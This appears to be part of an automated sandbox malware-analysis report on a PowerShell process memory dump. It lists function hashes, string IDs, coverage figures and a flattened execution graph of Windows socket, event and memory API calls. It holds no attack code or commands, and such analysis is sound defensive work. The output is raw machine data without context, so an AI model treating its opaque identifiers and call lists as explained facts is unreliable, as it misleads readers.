                                                                                      • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-210473685
                                                                                      • Opcode ID: b17de8d117e52493b4c963c1f5ee9ebd1653aed5f1c83e245cfafdf55f246bc4
                                                                                      • Instruction ID: ccc9cfec8a66f1e7f30bc3065ff09bc530a152d06f8f57221f2160acf20e2fac
                                                                                      • Opcode Fuzzy Hash: b17de8d117e52493b4c963c1f5ee9ebd1653aed5f1c83e245cfafdf55f246bc4
                                                                                      • Instruction Fuzzy Hash: 545137F57043168FEB2D8A69C81067BBBFAEFC2211F14847BD849CB255DA31C885C7A1
                                                                                      Function 07316C68 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                                      • API String ID: 0-728028659
                                                                                      • Opcode ID: f6af3197b8e65f422385abc8433b71aeda0fd9cbaa2962397c318401c36a7464
                                                                                      • Instruction ID: 6025f2d7ac09215c878fe78c89a884d0f7e6599f858dff63c225f9a63ce683e5
                                                                                      • Opcode Fuzzy Hash: f6af3197b8e65f422385abc8433b71aeda0fd9cbaa2962397c318401c36a7464
                                                                                      • Instruction Fuzzy Hash: 8C31A6F2A00215DFFB2C8E85C642766B7F6EB45360F18C1A9D91D5B291CF72D850CBA1
                                                                                      Function 0731C810 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4l$4l
                                                                                      • API String ID: 0-4178271061
                                                                                      • Opcode ID: 54a89c1a6ec8ed2ccd6d9a37ce880761903f5a80d0e0be74ca811a1385dff233
                                                                                      • Instruction ID: 530e610530bb1986c4ffbcc055f3d94144debf916887a7a4533001cf7e7a219d
                                                                                      • Opcode Fuzzy Hash: 54a89c1a6ec8ed2ccd6d9a37ce880761903f5a80d0e0be74ca811a1385dff233
                                                                                      • Instruction Fuzzy Hash: 8761C5B0B402059FE718CB68C550B6EBBE6EF89710F149429D809AF754DB36DC41CBA2
                                                                                      Function 0731D96F Relevance: 5.2, Strings: 4, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$84l$tPjq$tPjq
                                                                                      • API String ID: 0-2327125206
                                                                                      • Opcode ID: a95df19cc4394e04586b9cf9ee1475d9b8bace5bc52fac21d56934d2e09a92a1
                                                                                      • Instruction ID: e555e48298ec54f3fb35ad4839b7d2ce91a80f05380f16b2b6a41e63507afb60
                                                                                      • Opcode Fuzzy Hash: a95df19cc4394e04586b9cf9ee1475d9b8bace5bc52fac21d56934d2e09a92a1
                                                                                      • Instruction Fuzzy Hash: 9D5193B5B20215DFEB28CE58C540B6AF7E6BF8A310F15C559E809AB790CB71EC41CB90
                                                                                      Function 07312198 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$84l$tPjq$tPjq
                                                                                      • API String ID: 0-2327125206
                                                                                      • Opcode ID: f03c1769be3f73e43598710b4ce2264e70428118df631a50efc77624ec577d79
                                                                                      • Instruction ID: 600b6cdd253ca053c998f724a374df7bc2b28714d6923372e50ff6af980967cd
                                                                                      • Opcode Fuzzy Hash: f03c1769be3f73e43598710b4ce2264e70428118df631a50efc77624ec577d79
                                                                                      • Instruction Fuzzy Hash: 31416BB17043599FD7294B698C00B2BBFE6FF8A710F1584AAE948DF291CA31CC41C3A1
                                                                                      Function 07310858 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-2428501249
                                                                                      • Opcode ID: 34627e013b3d47e2394d1eb90f785f9bc865ba9cb774503730e6cc9b378f1b51
                                                                                      • Instruction ID: 1ad7090ea8e0e8950be8c12541ea5be25fa85cc98ca4eed044f6998c4b8568aa
                                                                                      • Opcode Fuzzy Hash: 34627e013b3d47e2394d1eb90f785f9bc865ba9cb774503730e6cc9b378f1b51
                                                                                      • Instruction Fuzzy Hash: 402137B13183065BFB2C596A895073B77EAEBC5711F20842AE90DDB795CD36C88183A1
                                                                                      Function 0731703C Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-2428501249
                                                                                      • Opcode ID: b50c69f343f0ba8328f2f21c112fb6449cb2e59cacd91858e9336ff62ee6af7c
                                                                                      • Instruction ID: f1d61e1c885a21358e69ed9e4869d5816a7bb542da4e7aa96da469c80e927618
                                                                                      • Opcode Fuzzy Hash: b50c69f343f0ba8328f2f21c112fb6449cb2e59cacd91858e9336ff62ee6af7c
                                                                                      • Instruction Fuzzy Hash: 3F21C4F6A043079FEB398E65CD002A6BBB5BF46250F1D407AD84D87242D735C985C7A3
                                                                                      Function 07311238 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$$jq$$jq
                                                                                      • API String ID: 0-1496060811
                                                                                      • Opcode ID: 62c38c2eea934cf7a7b27fc79999b4d9d038a5833061911a461f7c6489369b07
                                                                                      • Instruction ID: 7b2b6610da0c140cfc7995a73a4ffddf519d954972148c904a279f37f0cd7b97
                                                                                      • Opcode Fuzzy Hash: 62c38c2eea934cf7a7b27fc79999b4d9d038a5833061911a461f7c6489369b07
                                                                                      • Instruction Fuzzy Hash: EF01D46134D39E8FD72B163858201AA7FB69FC351032A00EBC585DF2E7C9698D46C367

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.4%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:1.5%
                                                                                      Total number of Nodes:1579
                                                                                      Total number of Limit Nodes:17
                                                                                      execution_graph 17250 595d49e 17253 5952762 17250->17253 17254 5952769 free 17253->17254 15254 5941c8f 15255 5941ca0 15254->15255 15256 5941cb8 15254->15256 15272 5944263 15255->15272 15257 5941cc2 15256->15257 15258 5941cd9 15256->15258 15267 59446ed malloc memset 15257->15267 15262 5941c6a free 15258->15262 15265 5941cb3 15262->15265 15264 5941ccd 15280 5944829 15264->15280 15288 594e798 memset 15267->15288 15269 5944717 15289 594e7ac calloc 15269->15289 15271 594474a 15271->15264 15273 5944277 15272->15273 15274 5944270 15272->15274 15423 5944344 15273->15423 15415 594427f 15274->15415 15277 5941ca6 15278 5941c6a free 15277->15278 15279 5941c88 15278->15279 15279->15265 15639 594ebdf 15280->15639 15283 5944894 15646 594453e 15283->15646 15285 594483f 15286 5944845 15285->15286 15643 59444f8 15285->15643 15286->15265 15288->15269 15290 594e7da 15289->15290 15292 594e7ef 15289->15292 15290->15292 15293 594e866 15290->15293 15292->15271 15294 594e876 15293->15294 15295 594e87c 15293->15295 15305 594ef4e 15294->15305 15298 594e896 15295->15298 15311 594ef8e 15295->15311 15302 594e8ff 15298->15302 15317 594e700 memset 15298->15317 15300 594e8ef 15318 594e9d5 memset 15300->15318 15302->15292 15306 594ef57 15305->15306 15310 594ef7e _mbstowcs_s 15305->15310 15334 5952427 15306->15334 15308 594ef75 15309 5952427 free 15308->15309 15309->15310 15310->15295 15312 594ef9a 15311->15312 15316 594efc8 _mbstowcs_s 15311->15316 15338 5956eef 15312->15338 15314 594efbc 15360 59567b6 15314->15360 15316->15298 15317->15300 15408 5951a49 memset 15318->15408 15320 594e9f0 15409 5951a49 memset 15320->15409 15322 594e9fc 15410 5952416 memset 15322->15410 15324 594ea05 15411 5952416 memset 15324->15411 15326 594e8f7 15327 594e92e memset 15326->15327 15412 59527ab memset 15327->15412 15329 594e94d 15413 5953799 memset 15329->15413 15331 594e961 15414 5956a51 memset 15331->15414 15333 594e984 15333->15302 15335 5952463 _mbstowcs_s 15334->15335 15336 5952430 _mbstowcs_s 15334->15336 15335->15308 15336->15335 15337 5952457 free 15336->15337 15337->15335 15339 5956ef8 15338->15339 15359 5956f52 _mbstowcs_s 15338->15359 15370 594f49d 15339->15370 15342 594f49d _mbstowcs_s free 15343 5956f0a 15342->15343 15344 594f49d _mbstowcs_s free 15343->15344 15345 5956f13 15344->15345 15346 594f49d _mbstowcs_s free 15345->15346 15347 5956f1c 15346->15347 15348 594f49d _mbstowcs_s free 15347->15348 15349 5956f25 15348->15349 15350 594f49d _mbstowcs_s free 15349->15350 15351 5956f2e 15350->15351 15352 594f49d _mbstowcs_s free 15351->15352 15353 5956f37 15352->15353 15354 594f49d _mbstowcs_s free 15353->15354 15355 5956f40 15354->15355 15356 594f49d _mbstowcs_s free 15355->15356 15357 5956f49 15356->15357 15358 594f49d _mbstowcs_s free 15357->15358 15358->15359 15359->15314 15361 59567bf 15360->15361 15369 59567e9 15360->15369 15374 5958aec 15361->15374 15364 5958aec __cfltcvt free 15365 59567d7 15364->15365 15366 594f49d _mbstowcs_s free 15365->15366 15367 59567e3 15366->15367 15382 59567ee 15367->15382 15369->15316 15371 594f4c2 15370->15371 15372 594f4a6 _mbstowcs_s 15370->15372 15371->15342 15372->15371 15373 594f4b6 free 15372->15373 15373->15371 15375 5958af5 15374->15375 15376 59567cb 15374->15376 15377 594f49d _mbstowcs_s free 15375->15377 15376->15364 15378 5958afb 15377->15378 15379 594f49d _mbstowcs_s free 15378->15379 15380 5958b04 15379->15380 15381 594f49d _mbstowcs_s free 15380->15381 15381->15376 15393 5958b12 15382->15393 15384 59567f9 15385 594f49d _mbstowcs_s free 15384->15385 15386 5956802 15385->15386 15387 5958aec __cfltcvt free 15386->15387 15388 595680e 15387->15388 15389 5958aec __cfltcvt free 15388->15389 15390 595681a 15389->15390 15391 594f49d _mbstowcs_s free 15390->15391 15392 5956826 15391->15392 15392->15369 15394 5958b1e 15393->15394 15395 5958b81 _mbstowcs_s 15393->15395 15396 594f49d _mbstowcs_s free 15394->15396 15398 5958b51 15394->15398 15395->15384 15399 5958b2d 15396->15399 15397 5958b76 free 15397->15395 15398->15395 15398->15397 15400 5958aec __cfltcvt free 15398->15400 15401 594f49d _mbstowcs_s free 15399->15401 15400->15398 15402 5958b36 15401->15402 15403 594f49d _mbstowcs_s free 15402->15403 15404 5958b3f 15403->15404 15405 5958aec __cfltcvt free 15404->15405 15406 5958b48 15405->15406 15407 594f49d _mbstowcs_s free 15406->15407 15407->15398 15408->15320 15409->15322 15410->15324 15411->15326 15412->15329 15413->15331 15414->15333 15416 594428c 15415->15416 15417 594429a 15416->15417 15432 59442f5 15416->15432 15439 5943c47 15417->15439 15424 5944352 15423->15424 15425 5944357 15423->15425 15424->15425 15531 594ef10 15424->15531 15426 594427f 27 API calls 15425->15426 15431 5944361 15426->15431 15428 594436e 15428->15425 15429 594437f 15428->15429 15535 59443a6 15429->15535 15431->15277 15446 594f03c 15432->15446 15434 5944300 15435 5943c47 free 15434->15435 15436 594430c 15435->15436 15458 594431e memset 15436->15458 15438 5944312 free 15438->15417 15440 5943c54 15439->15440 15441 5943c67 15439->15441 15440->15441 15460 5943bd5 15440->15460 15443 59442c2 15441->15443 15463 5949659 15443->15463 15445 59442b4 15445->15277 15448 594f049 _mbstowcs_s 15446->15448 15457 594f0fd _mbstowcs_s 15446->15457 15447 594f08b 15449 594f098 15447->15449 15451 594ef4e free 15447->15451 15448->15447 15450 594f083 free 15448->15450 15452 594ef8e 2 API calls 15449->15452 15455 594f0b3 15449->15455 15450->15447 15451->15449 15453 594f0ab 15452->15453 15456 594ef4e free 15453->15456 15454 594f0eb strlen 15454->15457 15455->15454 15455->15457 15456->15455 15457->15434 15459 594433f 15458->15459 15459->15438 15461 5943bdf free 15460->15461 15462 5943bea 15460->15462 15461->15462 15462->15441 15464 5949668 15463->15464 15470 5949685 15463->15470 15465 59496f3 abort 15464->15465 15466 5949693 15464->15466 15467 594967e 15464->15467 15468 594968a 15464->15468 15464->15470 15489 594bac0 15466->15489 15473 594aa5b 15467->15473 15485 594bc6d 15468->15485 15470->15445 15474 594aa97 15473->15474 15475 594aa73 15473->15475 15479 594ab98 2 API calls 15474->15479 15481 594aa8c 15474->15481 15476 594aa86 15475->15476 15477 594aa7a shutdown 15475->15477 15493 594ab98 15476->15493 15477->15481 15483 594aaaa 15479->15483 15480 594ab4a closesocket 15482 594ab57 15480->15482 15481->15480 15481->15482 15482->15470 15483->15481 15484 594aad3 closesocket 15483->15484 15484->15483 15498 594add9 15485->15498 15487 594bc78 closesocket 15488 594bc89 15487->15488 15488->15470 15490 594bacf 15489->15490 15492 594bad4 15489->15492 15500 594bade 15490->15500 15492->15470 15494 594abb0 15493->15494 15495 594abde CancelIo 15494->15495 15496 594abbb WSAIoctl 15494->15496 15495->15481 15496->15495 15497 594abd9 15496->15497 15497->15481 15499 594ade3 15498->15499 15499->15487 15501 594baf2 15500->15501 15503 594bb19 15501->15503 15504 594bb3f 15501->15504 15503->15492 15509 594bbab 15504->15509 15508 594bb80 15508->15503 15522 5948dfb 15509->15522 15512 594b2a0 15513 594b2c0 CreateEventA 15512->15513 15515 594b2b1 15512->15515 15514 594b329 15513->15514 15513->15515 15514->15508 15516 594b305 WaitForSingleObject 15515->15516 15517 594b331 CloseHandle 15515->15517 15521 594b338 15515->15521 15519 594b313 GetLastError CloseHandle WSASetLastError 15516->15519 15520 594b32e 15516->15520 15517->15521 15518 594b354 WSASetLastError 15518->15514 15519->15514 15520->15517 15521->15518 15523 5948e04 15522->15523 15524 5948e0e 15522->15524 15526 5948e11 CreateEventA InterlockedCompareExchange 15523->15526 15524->15512 15527 5948e4c CloseHandle WaitForSingleObject 15526->15527 15528 5948e3d SetEvent 15526->15528 15529 5948e5e 15527->15529 15528->15529 15529->15524 15532 594ef18 15531->15532 15533 594ef26 15531->15533 15532->15533 15539 594dd9a 15532->15539 15533->15428 15536 59443be 15535->15536 15536->15536 15626 594979b 15536->15626 15538 5944405 15538->15431 15540 594dda2 15539->15540 15541 594dde3 15539->15541 15540->15541 15544 594cfbf 15540->15544 15541->15533 15543 594dddf 15543->15533 15545 594cffa __cfltcvt 15544->15545 15547 594d033 15545->15547 15548 594d09f 15545->15548 15547->15543 15551 594d0ba __cfltcvt 15548->15551 15554 594d26a __cfltcvt 15548->15554 15550 594d1ad __cfltcvt 15550->15554 15555 595225c 15550->15555 15551->15550 15552 594d33a __cfltcvt 15551->15552 15551->15554 15552->15554 15559 59522be 15552->15559 15554->15547 15556 5952270 15555->15556 15558 5952295 15556->15558 15567 5951bb2 15556->15567 15558->15554 15560 59522fc 15559->15560 15561 59522cc 15559->15561 15562 5952337 15560->15562 15592 595c303 15560->15592 15585 595ccd7 15561->15585 15562->15554 15568 5951bc4 15567->15568 15573 5951bda __cfltcvt 15567->15573 15569 5951c30 15568->15569 15570 5951c1a 15568->15570 15568->15573 15569->15573 15578 595c096 15569->15578 15574 595ca22 15570->15574 15573->15558 15577 595ca3a 15574->15577 15575 595cb56 15575->15573 15576 5951bb2 memset 15576->15577 15577->15575 15577->15576 15579 595c0ac 15578->15579 15581 595c0b0 15579->15581 15582 595c13e 15579->15582 15581->15573 15583 595c158 memset 15582->15583 15584 595c154 15582->15584 15583->15584 15584->15581 15595 595c641 15585->15595 15587 595ccf1 15588 59522f7 15587->15588 15589 595ca22 memset 15587->15589 15588->15554 15590 595cd09 15589->15590 15590->15588 15602 595cb62 15590->15602 15606 595c32a 15592->15606 15596 595c659 15595->15596 15601 595c783 15595->15601 15597 595c67a memset memset 15596->15597 15596->15601 15598 595c6e1 memset 15597->15598 15599 595c6c8 __cfltcvt 15597->15599 15598->15599 15600 5951bb2 memset 15599->15600 15600->15601 15601->15587 15603 595cb83 __cfltcvt 15602->15603 15604 595cbe0 memset 15603->15604 15605 595cc1b 15603->15605 15604->15605 15605->15588 15613 595bfc3 15606->15613 15608 5952332 15608->15554 15609 595c33d 15609->15608 15610 595c096 memset 15609->15610 15611 595c366 15610->15611 15611->15608 15617 595c182 15611->15617 15614 595bfdb 15613->15614 15615 595bfe4 memset 15614->15615 15616 595c000 _mbstowcs_s 15614->15616 15615->15616 15616->15609 15618 595c196 15617->15618 15619 595c19e 15617->15619 15618->15608 15620 595c1a3 15619->15620 15621 595c1ab 15619->15621 15622 595c13e memset 15620->15622 15623 595c2bf memset 15621->15623 15624 595c1a9 15621->15624 15622->15624 15623->15624 15624->15618 15625 5963f42 memset 15624->15625 15625->15618 15627 59497b9 15626->15627 15628 59497aa 15626->15628 15627->15628 15631 594a387 memset memset 15627->15631 15628->15538 15630 59497df 15630->15538 15632 594a3de WSASend 15631->15632 15633 594a3c8 CreateEventA 15631->15633 15634 594a44a GetLastError 15632->15634 15636 594a3fb 15632->15636 15633->15632 15635 594a457 WSAGetLastError 15634->15635 15634->15636 15638 594a401 15635->15638 15637 594a4d2 RegisterWaitForSingleObject 15636->15637 15636->15638 15637->15638 15638->15630 15640 5944837 15639->15640 15641 594ebea 15639->15641 15640->15283 15640->15285 15641->15640 15649 594ebb5 15641->15649 15644 59443a6 7 API calls 15643->15644 15645 5944515 15644->15645 15645->15286 15647 5944551 9 API calls 15646->15647 15648 594454f 15647->15648 15648->15286 15650 594ebc2 15649->15650 15651 594ebd9 15649->15651 15650->15651 15654 5956f5f 15650->15654 15651->15641 15655 594ebd7 15654->15655 15656 5956f6f 15654->15656 15655->15641 15656->15655 15657 5956fd7 15656->15657 15658 5956ff7 15656->15658 15659 5957017 15656->15659 15660 5956fbf 15656->15660 15661 5956fdf 15656->15661 15662 5956fff 15656->15662 15663 595701f 15656->15663 15664 595703b 15656->15664 15665 5956fc7 15656->15665 15666 5956fe7 15656->15666 15667 5957007 15656->15667 15668 5957027 15656->15668 15669 5956fcf 15656->15669 15670 5956fef 15656->15670 15671 595700f 15656->15671 15737 5957fbc 15657->15737 15777 5958469 15658->15777 15802 595889c 15659->15802 15687 5957096 15660->15687 15759 595834b 15661->15759 15789 59586f4 15662->15789 15815 594e2c9 15663->15815 15832 594e4b2 15664->15832 15697 595791e 15665->15697 15768 595841d 15666->15768 15794 594e29d 15667->15794 15823 594e62b 15668->15823 15725 594df08 15669->15725 15773 594dde9 15670->15773 15797 594e568 15671->15797 15688 59570ae 15687->15688 15689 59570b8 15687->15689 15688->15655 15689->15688 15838 59578ba time 15689->15838 15692 5957117 __cfltcvt 15692->15688 15840 595736b 15692->15840 15693 595726a 15843 59577f0 15693->15843 15695 5957318 15849 594cf2a 15695->15849 15853 594d510 15697->15853 15699 595793b 15700 5957950 15699->15700 15701 595794b 15699->15701 15706 595798a 15699->15706 15700->15655 15701->15700 15702 594dd9a 8 API calls 15701->15702 15702->15700 15703 594dd9a 8 API calls 15703->15700 15704 5957d07 15705 594dd9a 8 API calls 15704->15705 15705->15700 15706->15704 15709 5957a05 __cfltcvt 15706->15709 15718 5957a50 15706->15718 15707 5957a89 15708 594dd9a 8 API calls 15707->15708 15708->15700 15709->15707 15710 5957b13 time 15709->15710 15712 5957ae6 memcmp 15709->15712 15709->15718 15711 5957b08 __cfltcvt 15710->15711 15711->15707 15717 5957b8b 15711->15717 15712->15710 15713 5957afb 15712->15713 15860 594c78d 15713->15860 15717->15700 15717->15718 15874 5957f2c 15717->15874 15881 5957ed5 15717->15881 15886 5957deb 15717->15886 15891 5957dae 15717->15891 15896 5957e21 15717->15896 15901 5957d1e 15717->15901 15905 5957e9c 15717->15905 15910 5957e5d 15717->15910 15718->15700 15718->15703 15726 594df39 15725->15726 15736 594df73 15725->15736 15727 594d510 9 API calls 15726->15727 15726->15736 15728 594df5c 15727->15728 15728->15736 15959 594e0e5 15728->15959 15733 594dfc7 15984 594f2fe 15733->15984 15735 594dd9a 8 API calls 15735->15736 15736->15655 15738 5958022 15737->15738 15739 5957fde 15737->15739 15738->15655 15740 59581bc 15739->15740 15742 5957ff0 15739->15742 16212 59582d8 15740->16212 15743 594d510 9 API calls 15742->15743 15744 5957ff7 15743->15744 15744->15738 15745 595800b 15744->15745 15747 595803c 15744->15747 15745->15738 15748 594dd9a 8 API calls 15745->15748 15746 594dd9a 8 API calls 15746->15738 15749 5958077 15747->15749 15750 5958057 15747->15750 15748->15738 16199 59581d1 15749->16199 15750->15738 16196 595820a 15750->16196 15753 5958089 15754 594dd9a 8 API calls 15753->15754 15754->15738 15755 5958075 15755->15738 15755->15753 15756 5958118 15755->15756 15756->15738 16202 594f3d3 15756->16202 15758 5958137 __cfltcvt 15758->15738 15758->15746 15760 595835d 15759->15760 15765 595836c 15759->15765 15761 594d510 9 API calls 15760->15761 15760->15765 15762 595837e 15761->15762 15763 595838a 15762->15763 15762->15765 15767 595839e 15762->15767 15764 594dd9a 8 API calls 15763->15764 15764->15765 15765->15655 15766 594dd9a 8 API calls 15766->15765 15767->15765 15767->15766 15769 594d510 9 API calls 15768->15769 15770 595842a 15769->15770 15771 5958436 15770->15771 15772 594dd9a 8 API calls 15770->15772 15771->15655 15772->15771 15774 594de03 __cfltcvt 15773->15774 15775 594dea8 15773->15775 15774->15775 15776 594cf2a 8 API calls 15774->15776 15775->15655 15776->15775 15778 5958482 __cfltcvt 15777->15778 15779 595850b 15777->15779 16346 5956ba0 15778->16346 15787 5958506 15779->15787 16381 5956949 15779->16381 15784 595853a 15784->15655 15787->15784 15788 594cf2a 8 API calls 15787->15788 15788->15784 15790 594c78d 4 API calls 15789->15790 15792 595870e 15790->15792 15791 595876d 15791->15655 15792->15791 15793 594cf2a 8 API calls 15792->15793 15793->15791 15795 594cf2a 8 API calls 15794->15795 15796 594e2c7 15795->15796 15796->15655 15799 594e577 __cfltcvt 15797->15799 15798 594e603 memset 15800 594cf2a 8 API calls 15798->15800 15799->15798 15801 594e625 15800->15801 15801->15655 15803 594d510 9 API calls 15802->15803 15804 59588ae 15803->15804 15805 59588d5 15804->15805 15806 59588be 15804->15806 15812 59588c8 __cfltcvt 15804->15812 15808 59589b5 15805->15808 15810 5958920 _mbstowcs_s 15805->15810 15807 594dd9a 8 API calls 15806->15807 15807->15812 15809 594dd9a 8 API calls 15808->15809 15809->15812 15811 5958943 free calloc 15810->15811 15810->15812 15811->15812 15813 5958970 15811->15813 15812->15655 15814 594dd9a 8 API calls 15813->15814 15814->15812 15816 594d510 9 API calls 15815->15816 15817 594e2d6 15816->15817 15818 594e2f6 memset 15817->15818 15819 594e2e2 15817->15819 15822 594e317 15817->15822 15818->15822 15820 594dd9a 8 API calls 15819->15820 15821 594e2ec 15820->15821 15821->15655 15822->15655 15824 594e651 15823->15824 15825 594d510 9 API calls 15824->15825 15826 594e659 15825->15826 15827 594e66a 15826->15827 15830 594e67e 15826->15830 15831 594e674 __cfltcvt 15826->15831 15828 594dd9a 8 API calls 15827->15828 15828->15831 15829 594dd9a 8 API calls 15829->15831 15830->15829 15830->15831 15831->15655 15833 594e4c7 15832->15833 15835 594e4ea free 15833->15835 15836 594e4f5 15833->15836 15835->15836 16736 594e52a 15836->16736 15839 59578f7 15838->15839 15839->15692 15841 595738f strlen 15840->15841 15842 595739e __cfltcvt 15840->15842 15841->15842 15842->15693 15844 595788b 15843->15844 15845 595781c 15843->15845 15844->15695 15846 5957822 strlen 15845->15846 15848 595783b __cfltcvt 15845->15848 15846->15845 15847 5957865 strlen 15847->15848 15848->15844 15848->15847 15851 594cf4d 15849->15851 15850 594cf52 15850->15688 15851->15850 15852 594cfbf 8 API calls 15851->15852 15852->15850 15854 594d51f 15853->15854 15859 594d566 15853->15859 15915 594d58e 15854->15915 15857 594d58e memmove 15858 594d525 15857->15858 15858->15857 15858->15859 15919 594d5f1 15858->15919 15859->15699 15862 594c7b2 __cfltcvt _mbstowcs_s 15860->15862 15861 594c99a __cfltcvt 15866 594cae6 15861->15866 15873 594c7cc _mbstowcs_s 15861->15873 15952 5952546 15861->15952 15862->15861 15862->15873 15948 595246f 15862->15948 15865 595246f calloc 15865->15861 15956 5951a80 15866->15956 15869 594caf3 15872 5951a80 memset 15869->15872 15869->15873 15870 594cad9 15871 5952546 2 API calls 15870->15871 15871->15866 15872->15873 15873->15711 15875 5957f42 15874->15875 15878 5957f3e 15874->15878 15877 5957f71 strlen 15875->15877 15875->15878 15876 594dd9a 8 API calls 15879 5957f94 15876->15879 15877->15875 15880 5957f7c memcmp 15877->15880 15878->15876 15879->15717 15880->15875 15880->15879 15883 5957ede 15881->15883 15882 594dd9a 8 API calls 15884 5957f22 15882->15884 15883->15882 15885 5957eff 15883->15885 15884->15717 15885->15717 15887 5957dfa 15886->15887 15888 5957e01 15887->15888 15889 594dd9a 8 API calls 15887->15889 15888->15717 15890 5957e18 15889->15890 15890->15717 15892 5957dc0 15891->15892 15893 594dd9a 8 API calls 15892->15893 15895 5957dd5 15892->15895 15894 5957de2 15893->15894 15894->15717 15895->15717 15897 5957e30 15896->15897 15898 594dd9a 8 API calls 15897->15898 15899 5957e3d 15897->15899 15900 5957e54 15898->15900 15899->15717 15900->15717 15904 5957d2c 15901->15904 15902 594dd9a 8 API calls 15903 5957d88 15902->15903 15903->15717 15904->15902 15904->15903 15906 5957eab 15905->15906 15907 5957eb2 15906->15907 15908 594dd9a 8 API calls 15906->15908 15907->15717 15909 5957ecc 15908->15909 15909->15717 15911 5957e6c 15910->15911 15912 594dd9a 8 API calls 15911->15912 15913 5957e79 15911->15913 15914 5957e93 15912->15914 15913->15717 15914->15717 15916 594d5a0 15915->15916 15917 594d5a5 15915->15917 15916->15917 15918 594d5b3 memmove 15916->15918 15917->15858 15918->15917 15920 594d5ff 15919->15920 15921 594d645 15920->15921 15927 594d651 15920->15927 15921->15858 15923 594d60b 15923->15921 15931 594d713 15923->15931 15926 594dd9a 8 API calls 15926->15921 15928 594d68c 15927->15928 15929 594dd9a 8 API calls 15928->15929 15930 594d6b0 15928->15930 15929->15930 15930->15923 15932 594d71e 15931->15932 15934 594d62c 15931->15934 15935 594d73d 15932->15935 15934->15921 15934->15926 15936 594d75f 15935->15936 15941 594d8ed 15935->15941 15938 594da31 __cfltcvt 15936->15938 15940 594d7a2 __cfltcvt 15936->15940 15936->15941 15937 595225c memset 15937->15941 15938->15938 15938->15941 15942 5952345 15938->15942 15940->15937 15940->15941 15941->15934 15943 5952353 15942->15943 15946 5952384 15942->15946 15944 595cd23 memset memset memset memset memset 15943->15944 15945 595237c 15944->15945 15945->15941 15946->15945 15947 595c37b memset memset memset memset 15946->15947 15947->15945 15949 5952479 15948->15949 15951 594c981 15948->15951 15950 5952492 calloc 15949->15950 15949->15951 15950->15951 15951->15865 15951->15873 15954 59525ea _mbstowcs_s 15952->15954 15955 5952558 15952->15955 15953 59525c2 memset memset 15953->15954 15954->15870 15955->15953 15955->15954 15957 5951a91 memset 15956->15957 15958 5951a8a 15956->15958 15957->15958 15958->15869 15960 594e0f4 15959->15960 15965 594e10b 15959->15965 15962 594dd9a 8 API calls 15960->15962 15961 594e25c 15964 594dd9a 8 API calls 15961->15964 15963 594df6c 15962->15963 15963->15736 15978 5955c07 15963->15978 15964->15963 15965->15961 15966 594e161 calloc 15965->15966 15969 594e153 free 15965->15969 15967 594e197 15966->15967 15968 594e180 15966->15968 15988 5956528 memset 15967->15988 15970 594dd9a 8 API calls 15968->15970 15969->15966 15970->15963 15972 594e220 15972->15961 15972->15963 15973 594e249 memcmp 15972->15973 15973->15961 15973->15963 15975 594e19d 15975->15961 15975->15972 15976 594e260 15975->15976 15989 5955135 15975->15989 15977 594dd9a 8 API calls 15976->15977 15977->15963 15979 5955c22 15978->15979 15981 5955c4a 15979->15981 